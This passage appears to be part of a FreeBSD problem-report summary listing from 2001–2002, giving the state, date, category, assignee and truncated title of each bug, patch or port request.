not have error codes f [2001/05/12] bin/27283 brian netstat -i missing IPv4 input packet coun o [2001/05/12] bin/27289 green SSH don't do correct diagnostic when no r o [2001/05/12] ports/27291 jim Bluefish port doesn't build mo files o [2001/05/13] i386/27306 mp hw watchpoints work unreliable under gdb o [2001/05/14] bin/27319 obrien df displays amd pid processes o [2001/05/17] kern/27403 lpt driver doesn't handle flags anymore o [2001/05/17] bin/27423 change request o [2001/05/18] kern/27429 'dependant' is a misspelling o [2001/05/18] bin/27433 ps binary does not do what the man page s o [2001/05/20] misc/27471 Linux emulation is missing code needed to o [2001/05/20] ports/27473 anholt when I install the package XFree86-4.0.3_ o [2001/05/20] bin/27483 qa make sysinstall ask for the keymap at ins f [2001/05/22] ports/27542 sobomax xmps should not require gnome o [2001/05/23] kern/27571 bp Changing policy of shadowing files and di o [2001/05/23] bin/27604 change truncate to support low case size o [2001/05/24] i386/27627 machdep.tsc_freq does not exists on machi o [2001/05/25] misc/27633 Mapping for serbian keyboards, follows IS o [2001/05/25] docs/27653 doc Updates to send-pr.html to support MIME o [2001/05/26] docs/27654 doc Update to PR 27653 o [2001/05/26] kern/27660 Kernel does not return error if adding du o [2001/05/27] bin/27687 fsck wrapper is not properly passing opti o [2001/05/27] bin/27697 assar trouble compiling libroken f [2001/05/31] gnu/27803 Enhancement to sort(1) o [2001/06/01] misc/27829 kris pax's uid/gid cache is read-only a [2001/06/02] docs/27833 cjc No man page for locate.rc f [2001/06/02] kern/27834 Cannot warm-reboot Compaq AP400 due to SC o [2001/06/02] kern/27835 execve() doesn't conform to execve(2) spe s [2001/06/02] docs/27843 alex [PATCH] make.conf WITH_* variables aren't o [2001/06/02] kern/27849 dfr AGP RELEASE ioctl frees memory o [2001/06/04] misc/27872 "Load Config" (sysinstall) hangs Compaq D o [2001/06/06] ports/27903 peter Update: www/transproxy o [2001/06/06] docs/27921 markm manpage skey(1) should be skey(7) o [2001/06/07] alpha/27930 NE2000 not supported on FreeBSD Alpha 4.x o [2001/06/07] ports/27931 ports devel/pth vs. native pthreads conflict fi o [2001/06/07] alpha/27933 alpha Time jitter under load on FreeBSD 4.3 alp a [2001/06/07] ports/27936 mi Update /usr/ports/deskutils/xmdiary 3.0.1 o [2001/06/08] bin/27972 losing information with talk o [2001/06/10] i386/28023 sendmail tries to get the netgraph.ko mod a [2001/06/11] conf/28078 qa /stand/sysinstall skips distro selection a [2001/06/11] conf/28081 murray /stand/sysinstall errs out if /cdrom/ alr o [2001/06/13] ports/28121 sobomax New port: 3D modelling and animation syst o [2001/06/13] ports/28138 tg python os.statvfs module is not functiona a [2001/06/15] bin/28171 des [PATCH] to support a HTTP_REFERER env var a [2001/06/15] gnu/28189 [PATCH] fix for detecting empty CVS commi o [2001/06/16] kern/28206 bp UMAPFS module should depend on NULLFS - p o [2001/06/17] misc/28236 [PATCH] iso-8859-1_to_cp437.scm doesn't c o [2001/06/17] kern/28247 arr ATM/HARP driver for IDT and ForeLE ATM ca o [2001/06/18] misc/28255 picobsd documentation still references ol s [2001/06/18] kern/28260 UIO_MAXIOV needs to be made public o [2001/06/20] bin/28294 dump of vinum based file systems by devic o [2001/06/20] kern/28297 change request for sys/i386/conf/NOTES o [2001/06/21] ports/28332 dwcjr Gimp manual port 1-2 years out of date, m o [2001/06/21] bin/28333 rtprio/idprio setuid problems s [2001/06/22] i386/28346 n_hibma USB ethernet dongle detach requires "ifco o [2001/06/23] bin/28364 lex(1) generated files fail to compile cl o [2001/06/23] ports/28365 wosch Typical use of portchecheckout breaks int o [2001/06/23] docs/28371 phk malloc(2) man page correction o [2001/06/26] bin/28435 [patch] allow newsyslog to signal process o [2001/06/27] bin/28449 cracauer sh(1) aborts on certain input p [2001/06/27] misc/28455 GNU readline should be updated to 4.2 o [2001/06/27] misc/28456 german keymap with dead keys o [2001/06/27] ports/28471 keith no iso8859 font o [2001/06/28] misc/28494 n_hibma ugen usable only from "attach" or by usbd o [2001/06/29] misc/28529 runetype.h doesn't have C++ 'extern "C"' o [2001/06/30] docs/28555 doc [PATCH] style(9) isn't explicit about boo o [2001/06/30] kern/28566 bp Mount_null loopbacks can hang startx temp o [2001/07/01] bin/28620 ru xinstall has no way to pass options to st o [2001/07/02] ports/28644 jmz Make error when rebuilding xdvi o [2001/07/03] ports/28678 wosch portcheckout doesn't allow flexible build o [2001/07/03] kern/28681 sos ATAPI MO drive support o [2001/07/03] ports/28682 portmgr Some port install builds fail if silent ( o [2001/07/04] docs/28699 doc strptime(3) %d format specifier not compl f [2001/07/05] ports/28717 kuriyama net/net-snmp stop enumerate interfaces wh o [2001/07/06] ports/28771 ports opendx server fails to start o [2001/07/07] bin/28789 /usr/bin/last does not filter for uucp co o [2001/07/07] ports/28803 cy ports/comms/conserver does not support ## o [2001/07/08] ports/28810 lioux qpopper 4.0.3 + PAM modification; HAVE_SH o [2001/07/10] ports/28887 brian [PATCH] sandbox for httptunnel! o [2001/07/10] kern/28888 Acer 8000 NIC not detected correctly o [2001/07/11] misc/28890 merge.c compares int i against size_t siz o [2001/07/13] misc/28938 small PicoBSD - An update to the build script t a [2001/07/13] docs/28949 phk the mknod(8) man page stills refers to bl o [2001/07/14] bin/28972 dwmalone gamma returns same result as lgamma o [2001/07/14] i386/28975 mjacob RocketPort problems o [2001/07/14] misc/28980 Fujitsu/Siemens Lifebook E-6540 stalls wh o [2001/07/15] bin/28988 We need more simple message digesting too f [2001/07/15] docs/28994 dd New article for docproj "Checkpoint VPN-1 o [2001/07/18] bin/29062 markm krb4 and krb5 multiply defined version sy f [2001/07/18] bin/29071 relay patch for rwhod o [2001/07/19] misc/29077 At loading notebook pccardd not correctly o [2001/07/19] misc/29089 Some kind of fsbn0 error... o [2001/07/20] misc/29103 make (1) dump core while processing ^C fr o [2001/07/21] bin/29119 menu of fdisk editor in 4.3R does not lis o [2001/07/22] ports/29154 nik TeX resource settings from MAKE_ENV in pr o [2001/07/23] bin/29164 maxim [PATCH] lack of 'Do not fragment' flag in o [2001/07/23] conf/29167 rc.pccard doesn't check /var/run/pccardd. o [2001/07/23] kern/29169 mjacob FC loop that 'goes away' never times out o [2001/07/24] ports/29199 sobomax jdk12beta port should register open-motif o [2001/07/25] ports/29223 portmgr cyrus-imapd and postfix master.8 manpage o [2001/07/25] kern/29233 VIA 82C686 AC97 codec gets probed as 'chi o [2001/07/26] docs/29245 doc top(1) manpage doesn't understand SMP o [2001/07/27] kern/29264 Recovery from LIPs on FCAL using isp not a [2001/07/28] misc/29292 sos The functional addtion to burncd(8) o [2001/07/29] ports/29298 cpiazza Installation of documentation for vcdgear o [2001/07/29] alpha/29299 alpha FreeBSD 4.3 Alpha + Tekram SCSI adapter p o [2001/07/29] kern/29307 NIC Initialization fails on dual CPU syst o [2001/07/29] misc/29312 sound Using mixer on pcm misbehaves with onboar f [2001/07/29] kern/29318 mjacob Exabyte 8200 needs SA_QUIRK_1FM and SA_QU o [2001/07/30] gnu/29331 still documented broken options in gcc ma o [2001/07/30] ports/29343 ports new postgresql7 port feature o [2001/07/31] kern/29355 mux [patch] lchflags support o [2001/08/01] bin/29361 startslip can't load if_sl.ko o [2001/08/01] bin/29363 [PATCH] newsyslog can support time as ext o [2001/08/02] ports/29392 portmgr Small built-time glitch in Makefile for a o [2001/08/02] kern/29395 reaction on ctrl-alt-del - poweroff, halt o [2001/08/03] kern/29423 [PATCH] kernel security hooks implementat o [2001/08/07] kern/29499 dwmalone it is not possible to send creditionals o [2001/08/07] bin/29516 markm telnet from an non FreeBSD host still use o [2001/08/07] ports/29519 ports X11 ports generate undef pthread refs wit o [2001/08/07] misc/29529 dcs Boot prompt "?" command doesn't list "boo f [2001/08/08] kern/29538 joerg Mounting /dev/fd0 never completes o [2001/08/08] misc/29550 duplicate pings jinside of vmware 2.0 o [2001/08/09] docs/29571 doc [PATCH] No man page for pgrp kernel funct o [2001/08/09] bin/29581 sobomax proposed gethostbyXXXX_r() implementation f [2001/08/09] ports/29590 ports [new port] www/parser-bin One more server o [2001/08/11] kern/29621 n_hibma Missing man page for ulpt a [2001/08/12] i386/29639 murray entry for zip 250 drives in /etc/disktab f [2001/08/13] ports/29691 portmgr New port variable USE_COMPAT_LIB - bsd.po o [2001/08/14] kern/29698 linux ipcs doesn'work o [2001/08/15] kern/29727 amr_enquiry3 structure in amrreg.h (amr d o [2001/08/15] ports/29732 sobomax linking error f [2001/08/16] kern/29777 n_hibma kernel uscanner.c contains wrong vendor a f [2001/08/17] docs/29807 dd [PATCH] XFREE86_VERSION is undocumented f [2001/08/18] bin/29850 markm ftpd.c doesn't check via PAM/pam_acct_mgm f [2001/08/18] ports/29856 portmgr make extract of cyrus did an install of c f [2001/08/19] conf/29870 rc.diskless2 uses /usr/sbin/mtree before f [2001/08/19] kern/29875 scsi CURRENT driver for Tekram DC395X and DC31 o [2001/08/20] misc/29893 qa suggestions for 4.4 sysinstall o [2001/08/20] bin/29897 markm pam_unix patch, which uses loginclass pas o [2001/08/20] kern/29915 kernel panics on interaction with mlock a o [2001/08/21] ports/29929 ports wginstall.pl script chokes on calculated o [2001/08/22] bin/29961 ru A4 paper size for groff knob for /etc/mak o [2001/08/22] kern/29962 sent broadcast packets get spurious 4 byt a [2001/08/23] docs/30008 doc This document should be translated, comme o [2001/08/24] kern/30052 dc(4) driver queues outgoing pkts indefin o [2001/08/27] ports/30148 portmgr devel/libtool: shared libs with compaq-cc o [2001/08/28] kern/30160 Kernel panic when flash disk is removed a f [2001/08/28] ports/30166 ports ports/net/nettest2001 o [2001/08/28] kern/30179 FreeBSD 5.0 install hangs: deviceTry: mak o [2001/08/29] misc/30186 getaddrinfo does not handle incorrect ser o [2001/08/29] kern/30200 yokota Bug in psm in 4.4-RC o [2001/08/29] ports/30201 msmith editors/wordperfect in ports is not usabl o [2001/08/29] i386/30206 PS/2 server 85 can't boot kern.flp o [2001/08/29] misc/30213 Fatal Errors of Server Programe o [2001/09/01] docs/30253 bp [PATCH] mount_unionfs(8) and mount_nullfs o [2001/09/01] kern/30257 apm enabled kernel panics (4.4-RC) o [2001/09/03] ports/30298 chuckr [PATCH] a2ps-4.13 can't cope with ENOMEM o [2001/09/03] conf/30301 Default printcap "mx" config too small o [2001/09/04] misc/30320 n_hibma USB mouse does not work after return'ing o [2001/09/04] bin/30321 strftime(3) '%s' format does not work pro o [2001/09/05] conf/30341 be keymap: wrong Capslock behaviour with o [2001/09/05] bin/30360 vmstat returns impossible data o [2001/09/06] bin/30392 sh: incorrect value of $? in here-documen o [2001/09/07] misc/30412 rtdl/dlopen() fails to merge common varia o [2001/09/07] kern/30422 WDT hardware watchdog driver & daemon o [2001/09/07] bin/30424 Generalization of vipw to lock pwdb while f [2001/09/08] conf/30441 Can't set interface arguments for dhcp co o [2001/09/08] docs/30442 doc remove broken referemce to gettime(9) fro o [2001/09/08] docs/30443 keramida remove broken reference to kerberos(1) fr o [2001/09/08] docs/30444 keramida remove broken references to gated(8) and o [2001/09/09] i386/30461 sound no audio cd with cmi8330 o [2001/09/09] bin/30464 pthread mutex attributes -- pshared f [2001/09/09] bin/30471 brian periodic script output to a file always a o [2001/09/10] bin/30484 rpc.rstatd consumed lots of open file des o [2001/09/10] ports/30499 portmgr libtool-1.4.1 port diffs o [2001/09/11] i386/30503 imp stray pccard card insertion events after o [2001/09/11] kern/30510 no apm for VIA KT133A chipset o [2001/09/11] misc/30517 using sysinstall with install.cfg has no o [2001/09/12] misc/30526 inserting a Sony Ninja-ATA pcmcia style c o [2001/09/12] kern/30541 imp [PATCH] old pccard beep depends on value o [2001/09/12] bin/30542 [PATCH] add -q option to shut up killall o [2001/09/13] docs/30556 doc vnconfig man page incorrect; functionalit o [2001/09/13] kern/30570 boot loader don't reacts on USB keyboard o [2001/09/14] ports/30573 nakai /usr/X11R6/bin/xfce_setup does not create o [2001/09/16] kern/30608 kern.ps_showallproc=0 doesn't limit queri o [2001/09/16] docs/30618 keramida ediff man page incomplete o [2001/09/17] kern/30634 kevent.data value incorrect for UDP socke o [2001/09/17] bin/30639 apmd crashes on SIGHUP (under certain con o [2001/09/17] bin/30640 apmd does not terminate properly on SIGTE f [2001/09/18] bin/30661 alfred FreeBSD-current fails to do partial NFS f o [2001/09/20] misc/30683 [PATCH] loader(8) fails to load module wh a [2001/09/20] bin/30685 cjc Patch for usr.bin/hexdump o [2001/09/20] i386/30700 sound Applications cannot synchronize sound usi o [2001/09/20] ports/30701 ports setiathome port misuses the 'nobody' user o [2001/09/21] ports/30707 ports midnight commander can't handle correctly o [2001/09/22] ports/30732 obrien bash2 - pkg-plist fix and sample files ad a [2001/09/22] bin/30737 murray sysinstall leaks file descriptors on rest o [2001/09/23] ports/30754 nakai x11/dgs port overwrites a number of files o [2001/09/23] ports/30777 portmgr add a 'make pkg-plist' make target in por o [2001/09/24] ports/30788 sobomax compile works, install fails of graphics/ o [2001/09/24] kern/30794 sound ESS Solo-1 does not work after suspend/re o [2001/09/25] bin/30812 giant termcap database update o [2001/09/25] bin/30819 /bin/mv results in warnings when /bin/cp o [2001/09/25] kern/30836 wpaul Chipset SiS735 / NIC SiS 900 o [2001/09/26] ports/30848 roam courier imapd won't compile with vpopmail o [2001/09/26] bin/30854 bootpd/bootpgw change - skip ARP modifica o [2001/09/26] misc/30857 intr_machdep.c allows access out of array f [2001/09/26] i386/30860 While install after "Mounting root from u o [2001/09/27] bin/30863 bootpd/dovend.c Win95 compatibility impro f [2001/09/27] ports/30870 ports httpd in free(): warning: recursive call o [2001/09/27] docs/30873 doc ``ip'' man page does not specify byte ord o [2001/09/29] ports/30923 obrien small fix for devel/gindent port o [2001/09/30] ports/30929 brian [net/pppoa] use usbd to initialize USB AD o [2001/09/30] ports/30936 taoka pips-sc880 installed script contains inco o [2001/09/30] conf/30938 Improving behavior of /etc/periodic/daily o [2001/09/30] kern/30951 Optimize page queue scan on miss of speci o [2001/10/01] alpha/30970 alpha Ensoniq 1371 (Creative chipset) does not o [2001/10/02] ports/30983 portmgr [PATCH] Some staroffice cdrom fixes o [2001/10/03] ports/31013 obrien John The Ripper Package Lists Bad Path o [2001/10/04] bin/31034 regularly add original address logging fo o [2001/10/04] kern/31043 Missing Ptrace functionality in Linuxulat o [2001/10/04] kern/31048 linprocfs:/proc/meminfo cannot handle mul p [2001/10/04] bin/31052 fenner Traceroute needs update f [2001/10/05] ports/31061 ports New port: security/gnupg-devel o [2001/10/07] misc/31097 main thread will accept() failure when so o [2001/10/07] docs/31109 doc replace gif images w/ png ones due to pat f [2001/10/09] ports/31159 cpiazza gmixer 0.98c dumps core with some mixers o [2001/10/09] docs/31164 doc man page for strftime is incorrect o [2001/10/10] bin/31199 tunefs error is incorrect when enabling s o [2001/10/10] conf/31200 Modification of rc.diskless1 needs change o [2001/10/10] bin/31201 [patch] add free_space(chunk) to libdisk o [2001/10/10] docs/31210 peter cvs info page missing -R f [2001/10/11] ports/31222 ports ports:astro/SETIsupport(version is wrong) o [2001/10/13] kern/31255 select with zero timeout returns 0 even w o [2001/10/14] docs/31264 jdp cvsup(1) "base" option and keyword descri a [2001/10/14] docs/31271 doc rl(4) discourages vender openness by disp f [2001/10/15] ports/31282 ports NEW PORT: aolserver+ad o [2001/10/15] misc/31297 yokota New screen blanker module for syscons o [2001/10/18] i386/31353 'shutdown -p' does not work on SMP Tyan T o [2001/10/19] kern/31367 General boot fault during mounting root w o [2001/10/19] ports/31369 adrian New KMerlin Port o [2001/10/19] misc/31380 NFS rootfs mount failure message too cryp o [2001/10/20] bin/31387 When getuid()=0, mailwrapper should drop o [2001/10/20] ports/31389 portmgr tidy readme templates + port readme enhan o [2001/10/21] i386/31427 minor incorrect code in sys/i386/i386/pma o [2001/10/22] bin/31432 umount(8) and unmount(2) don't corespond o [2001/10/22] kern/31445 sound cat sound.au > /dev/audio fails for sound a [2001/10/23] kern/31455 n_hibma [PATCH] ohci driver probrem when send dat o [2001/10/23] kern/31456 Register number definition for AMD PCnet o [2001/10/23] ports/31462 peter rdist6 does not like accounts with '.' in o [2001/10/25] ports/31486 kuriyama ports/palm/prc-tools-gcc does not build m o [2001/10/25] kern/31490 Panic in sysctl_sysctl_next_ls on empy no o [2001/10/26] kern/31521 cg pcm0 plays too fast on Intel 82801BA (ICH o [2001/10/27] i386/31535 Can't reboot system: Tyan Thunder K7+ Dua o [2001/10/28] conf/31555 rc.syscons does not run standalone o [2001/10/29] bin/31588 change request to allow mount(1) to set t o [2001/10/29] kern/31624 writev may return undocumented ECONNRESET o [2001/10/30] ports/31630 jmz Port se-ispell install the dictionary in a [2001/10/30] bin/31632 cjc ip6fw error under DNS dislabled environme o [2001/10/30] docs/31640 charnier Avoiding uppercase program names in manpa o [2001/10/30] kern/31647 socket calls can return undocumented EINV o [2001/10/30] docs/31653 jim Chapter 14 of the Handbook lacks content o [2001/10/31] ports/31669 ports New port: graphics/xawtv_applet o [2001/11/01] i386/31686 Problem with the timestamp option when fl o [2001/11/02] kern/31708 VM system / fsync / flushing delayed inde o [2001/11/02] kern/31711 Enhancements and bug fixes to Aironet dri o [2001/11/02] i386/31716 FreeBSD uses broken tsc timecounter by de f [2001/11/03] ports/31744 ports New port: emulators/minix (2.0.0) o [2001/11/05] gnu/31772 New option in dialog(1) o [2001/11/09] misc/31890 new syscons font o [2001/11/10] bin/31906 No method available to unwind atexit(3) s o [2001/11/11] ports/31910 greid comms/sms_client o [2001/11/12] ports/31926 lioux New port security/drweb-qmail: Qmail mess o [2001/11/12] bin/31933 dillon pw can interpret numeric name as userid d a [2001/11/12] ports/31943 dirk mysql323-server port hostname look up fai o [2001/11/12] ports/31944 portmgr bsd.port.mk: USE_XPM (implied by USE_MOTI o [2001/11/13] kern/31971 microuptime() went backwards when apm is o [2001/11/14] misc/31981 (mis)feature in getnetent parsing -- comm o [2001/11/14] bin/31985 New /etc/remote flag for tip to append LF o [2001/11/14] bin/31987 patch to allow dump(1) to notify operator s [2001/11/15] i386/32014 ppi locks up system during boot o [2001/11/15] docs/32020 doc loader.8 manpage missing tunables o [2001/11/16] ports/32039 greid UPDATE devel/asmutils 0.14 -> 0.15 a [2001/11/16] docs/32041 doc Add point about net.inet.tcp.portange.{fi o [2001/11/16] docs/32054 doc inconsistency between index.3 and rindex. o [2001/11/17] conf/32067 Problems with spanish keyboard in console o [2001/11/18] bin/32092 crypt pickups the wrong password format o [2001/11/19] conf/32108 Proposed Firewall (IPv4) configuration sc o [2001/11/19] ports/32114 portmgr WRKDIRs should be moved to a central loca a [2001/11/19] misc/32120 PR misc/24324 errata o [2001/11/19] ports/32122 anholt xf86cfg graphics-mode fails on Samsung Sy o [2001/11/20] standards/32126 getopt(3) not Unix-98 conformant f [2001/11/20] misc/32144 murray unattended install with sysinstall doesn' o [2001/11/20] ports/32145 jmz XFree86 doesn't ldconfig itself o [2001/11/20] ports/32147 kris mindguard port dumps core o [2001/11/21] ports/32174 portmgr Autoconf patch for bsd.port.mk o [2001/11/22] ports/32202 kbyanc ports/devel/py-htmlkit distribution does f [2001/11/23] misc/32210 System hangs while kernel waiting for SCS o [2001/11/23] ports/32232 dirk Update and bugfix port: www/mod_php4 o [2001/11/23] ports/32243 sobomax ports/py-wxPython fails to compile o [2001/11/24] i386/32251 bugfix and new feature for apmd o [2001/11/24] ports/32258 scrappy converters/p5-Convert-ASN1 out of date o [2001/11/24] ports/32259 scrappy Update security/p5-IO-Socket-SSL request o [2001/11/26] conf/32288 After install: /etc/rc complains if crypt o [2001/11/26] bin/32299 peter nm coredumps on sendmail in -current o [2001/11/26] i386/32301 dfr Fix for agpgart for the AMD-751 and relat o [2001/11/26] ports/32317 petef Request for linux-qt port o [2001/11/26] bin/32318 cjc no userland tool available to test resolv f [2001/11/28] ports/32361 ports port doesn't work, www/mod_log_mysql o [2001/11/28] ports/32362 ports postgresql7 port should install more *.h a [2001/11/29] conf/32375 murray sysinstall doesn't respect User generated o [2001/11/30] misc/32400 rwhod - option to specify hostname o [2001/11/30] ports/32405 dirk Japanese encoding translation support for a [2001/11/30] bin/32411 shutdown's absolute-time handling could b o [2001/12/01] docs/32425 doc Document cvs update `P file' output o [2001/12/01] bin/32433 Cannot specify files beginning with + on o [2001/12/02] ports/32444 dirk www/mod_php4: ctype support f [2001/12/03] kern/32478 scsi/NIC drivers fail when using SMP kern o [2001/12/03] misc/32480 Missing graphic characters in syscons fon o [2001/12/04] bin/32501 quot(8) is stupid regarding the filesyste o [2001/12/04] ports/32502 dima port update palm/pilot-link to 0.9.6 o [2001/12/04] ports/32508 ports www/flashplugin-mozilla has malloc bug o [2001/12/04] ports/32517 green Update port: emulators/snes9x to 1.39 s [2001/12/07] docs/32578 doc A _really_ petty change to the front page o [2001/12/07] ports/32582 greid Update port: audio/tempest_for_eliza o [2001/12/07] bin/32588 grog operator should backup vinum vols o [2001/12/08] ports/32604 portmgr Many ports which depends on apache don't f [2001/12/08] misc/32605 nsouch SMBus driver broken o [2001/12/09] ports/32651 ache a small patch to obtain socks5 support to o [2001/12/09] kern/32652 joe A new ioctl to uscanner s [2001/12/09] ports/32653 joe Added patches to improve USB scanner supp f [2001/12/09] bin/32657 sed file handing is non-standard o [2001/12/09] kern/32659 dillon VM and VNODE leak with vm.swap_idle_enabl o [2001/12/09] gnu/32661 dd send-pr uses $LOGNAME for From and Reply o [2001/12/09] docs/32662 dd arp(8) uses "this host" with two differen o [2001/12/10] i386/32666 imp mbufs leaks in dev/ed o [2001/12/10] bin/32667 systat waste too much time reading input o [2001/12/10] kern/32671 imp Patch to generate usbdevs.h automatically o [2001/12/10] docs/32674 doc no man page for the ntp_adjtime system ca a [2001/12/10] bin/32675 kris openssl dhparam hangs when using /dev/ran o [2001/12/10] kern/32677 pciconf -l opens /dev/pci for read/write o [2001/12/10] misc/32680 [PATCH] Allows users to start jails by ho o [2001/12/12] ports/32762 ache Update for archivers/xpk o [2001/12/13] kern/32799 ucom and uplcom drivers ported from NetBS o [2001/12/13] bin/32808 dwmalone [PATCH] tcpd.h lacks prototype for hosts_ o [2001/12/13] kern/32812 roger bktr driver missing tuner for eeprom dete o [2001/12/14] bin/32828 phk w incorrectly handles stale utmp slots wi o [2001/12/15] kern/32880 ambrisko Update aironet driver to correct signal s o [2001/12/16] gnu/32902 Incremental tar archiving using GNU style p [2001/12/16] kern/32912 mp options misssing TCBHASHSIZE o [2001/12/16] ports/32917 portmgr installing ports may fail if $GREP_OPTION o [2001/12/17] ports/32936 mharo ports/security/keyprint only supports S/K o [2001/12/18] conf/32976 assar Kerberos5 config files not installed by d o [2001/12/18] docs/32979 assar manpages are not installed for k5admin an f [2001/12/18] ports/32999 ports New ports: devel/ORBacus4 o [2001/12/19] kern/33004 n_hibma Patch for USB (uhci) o [2001/12/19] misc/33007 n_hibma umass device timeout after successive use o [2001/12/19] misc/33013 cg mixer does not have treble/bass for Sound o [2001/12/19] conf/33018 Patch for RC (add multiple SSHD configura o [2001/12/21] bin/33066 rwatson sysinstall does not write to new disks as o [2001/12/22] i386/33097 sound Crystal 4237b mixer problems o [2001/12/23] ports/33108 portmgr Generate an error if WRKDIRPREFIX == /usr o [2001/12/23] kern/33117 empty struct md_coredump in pcb.h and use o [2001/12/23] kern/33124 jhb kthread_create doesnt mark kthreads as kt s [2001/12/23] bin/33133 keyinit outputs wrong next login password o [2001/12/25] gnu/33182 mp gdb seg faults when given handle SIGALRM o [2001/12/26] ports/33196 portmgr duplicate lines in /usr/ports/INDEX o [2001/12/26] kern/33202 msmith sys/dev/mly/mly.c minor mly_printf cosmet o [2001/12/26] kern/33203 dillon "got bad cookie" errors on NFS client o [2001/12/26] ports/33224 me Build breaks on CURRENT due to 0 o [2002/02/01] ports/34523 ports man pages of nwclient602 install to wrong o [2002/02/01] docs/34529 doc [patch] Grammar nits in usbd.conf(5) and f [2002/02/01] i386/34537 The second NIC card could not get configu o [2002/02/01] gnu/34538 mp_set_memory_functions not extern "C"'d o [2002/02/01] docs/34547 keramida [patch] edits of FAQ Introduction o [2002/02/02] ports/34550 ports ghostscript-gnu-nox11 portversion 6.51 fa o [2002/02/02] ports/34565 ports graphics/blender port is broke o [2002/02/03] docs/34577 doc Some man pages still advise using "confli o [2002/02/03] kern/34591 ICMP bandwidth limiting does not indicate f [2002/02/03] misc/34596 slow gettimeofday in FreeBSD 4.5 o [2002/02/03] ports/34597 eivind [PATCH] Update ports/mail/isync to 0.8 s [2002/02/04] misc/34621 billf i have a patch for (lol) /usr/games/fish o [2002/02/04] docs/34626 doc Copyright on "Index of /mail/current" pag o [2002/02/04] bin/34628 sobomax pkg-routines ignore the recorded md5 chec o [2002/02/04] bin/34629 des fetch(1) cannot download RH 7.2 ISOs from o [2002/02/05] ports/34635 ports games/flightgear o [2002/02/05] kern/34637 LINT is wrong -- NMBCLUSTERS doesn't auto o [2002/02/05] misc/34642 Windows 2000 will not dual boot with Free o [2002/02/05] docs/34654 doc Update UIDs for porters handbook o [2002/02/06] ports/34659 reg Proposed change to Mozilla port's Makefil o [2002/02/06] kern/34665 darrenr ipfilter rcmd proxy "hangs". o [2002/02/06] misc/34673 Second call to select() waits ~100ms befo o [2002/02/06] bin/34676 obrien dhclient always in -q quiet mode (PATCH E o [2002/02/07] gnu/34709 [patch] Inaccurate GDB documentation o [2002/02/07] kern/34712 [patch] SCSI quirk for USB Memorybird o [2002/02/07] ports/34714 ache unzip(1) breaks filenames in non-ASCII ch o [2002/02/07] ports/34717 portmgr bsd.port.mk: extraneous quotes in PTHREAD o [2002/02/07] ports/34718 portmgr make fetch-list includes things make fetc f [2002/02/07] bin/34728 murray DHCP hostname set as Hexadecimal string o [2002/02/08] conf/34729 sheldonh treat smbfs as network file system in /et o [2002/02/08] ports/34737 ports New port: graphics/lodju o [2002/02/08] ports/34742 obrien bash2 missing build dependency on autocon o [2002/02/08] kern/34747 joe Please add USB floppy entry o [2002/02/09] misc/34759 Phantasia does not accept [enter] key f [2002/02/09] ports/34760 ports New port: net/dstumbler a curses based ap o [2002/02/09] conf/34776 rc.diskless1 creates insufficiently sized o [2002/02/10] misc/34788 dwmalone dmesg issues with console output o [2002/02/10] kern/34789 joe PNY brand USB flash readers need 10 byte o [2002/02/10] ports/34796 jmz wrong path in /etc/XF86Config (purely cos o [2002/02/10] ports/34815 pat new port: freenet, the anonymous internet o [2002/02/11] kern/34820 FreeBSD should be able to beep after shut o [2002/02/11] bin/34832 /usr/share/man/cat3/setkey.3.gz linked to o [2002/02/11] bin/34834 "fix" of du(1) and -h o [2002/02/11] ports/34841 dirk Adding cyrus to mod_php o [2002/02/11] bin/34843 fenner `tcpdump port echo' filters for port 4 in o [2002/02/11] misc/34850 scp cannot talk to ssh2 sites that have S o [2002/02/11] kern/34854 /src/sys/dev/sound doesn't work correctly f [2002/02/12] ports/34870 ports new port: lang/pnetlib o [2002/02/12] bin/34874 Netstat output to small o [2002/02/12] ports/34878 chern sysinstall o [2002/02/12] kern/34880 Impossibility of grouping IP into a pipe o [2002/02/13] bin/34919 portmap can not exclusively bind to 127.0 o [2002/02/13] misc/34924 kscd crash on startup signal 11 f [2002/02/14] misc/34935 New locale (Cyrillic Windows Codepage 125 o [2002/02/14] kern/34942 Attempt to play -> "pcm0: play interrupt o [2002/02/14] alpha/34948 alpha Promise TX2 ATA133 controller doesnt work o [2002/02/14] kern/34952 Mouse cursor invisible with USB mice and o [2002/02/15] bin/34955 doc [PATCH] ps(1) is out of touch with realit o [2002/02/15] kern/34963 identify procs belonging to the same jail o [2002/02/15] kern/34965 4.4, 4.5 freeze at boot time on ASUS P2B f [2002/02/15] ports/34981 ports new port: misc/bibletime: biblestudy appl o [2002/02/15] ports/34987 portmgr bsd.port.mk: silence awk's warning f [2002/02/16] ports/34997 ports xf86cfg core dumps a [2002/02/16] ports/35007 ports New port archivers/arj: ARJ32 v 3.10 russ o [2002/02/16] kern/35010 pcm0 fails to attach with Intel 82801BA ( a [2002/02/16] docs/35011 doc There are no commands called "diskless" o o [2002/02/16] bin/35018 brian enhancing daily/460.status-mail-rejects o [2002/02/17] ports/35038 ports cleanup pkg-plist for x11-toolkits/Xaw3d o [2002/02/17] ports/35060 ports New port: deskmenu (GTK root menu applica o [2002/02/17] ports/35062 ports New Port: audio/xmms-mailnotify 0.2.0 o [2002/02/17] kern/35064 ACPI not work with Epox 8KHA+ motherboard o [2002/02/17] bin/35070 tjr math(3) references section "3m", etc. o [2002/02/18] i386/35078 Uninitialized pointer dereference in func o [2002/02/18] ports/35092 ports Xterm termcap should have color capabilit o [2002/02/18] bin/35099 sobomax ldd in -STABLE fails on libc. o [2002/02/18] i386/35101 chern cvusupit and other packages won't extract o [2002/02/19] bin/35109 [PATCH] games/morse: add ability to decod o [2002/02/19] bin/35113 grdc enhancement: countdown timer mode o [2002/02/19] ports/35117 ports Undefined symbol "ldap_get_dn" when tryin o [2002/02/19] i386/35124 No mouse with FreeBSD 4.5 with ECS K7S5a o [2002/02/19] ports/35131 ports New port: unittest framework for c o [2002/02/20] ports/35146 ports New port: A Unit testing framework for Ad o [2002/02/20] bin/35148 ppp/nat-problems after cvs update 4.3 -> o [2002/02/20] ports/35165 ports New port: textproc/smart an information r o [2002/02/20] kern/35171 Moused needs to be enabled to run a USB m o [2002/02/21] misc/35172 Please update am-utils(amd) into newer ve o [2002/02/21] kern/35175 ptrace(PT_DETACH, ....) doesn't do signal o [2002/02/21] ports/35177 chuckr math/gnuplot missing WITHOUT_X11 option o [2002/02/21] conf/35178 ipfilter for IPV6 not availlable in rc.* o [2002/02/21] i386/35182 APMD does not set close on exec for /dev/ o [2002/02/21] ports/35187 ports New port: xmlada - an xml processing libr o [2002/02/21] ports/35190 ports New Port: autoproject o [2002/02/21] kern/35195 msync performance on large files o [2002/02/22] ports/35204 dirk www/mod_php4 with xslt is not LOCALBASE c o [2002/02/22] 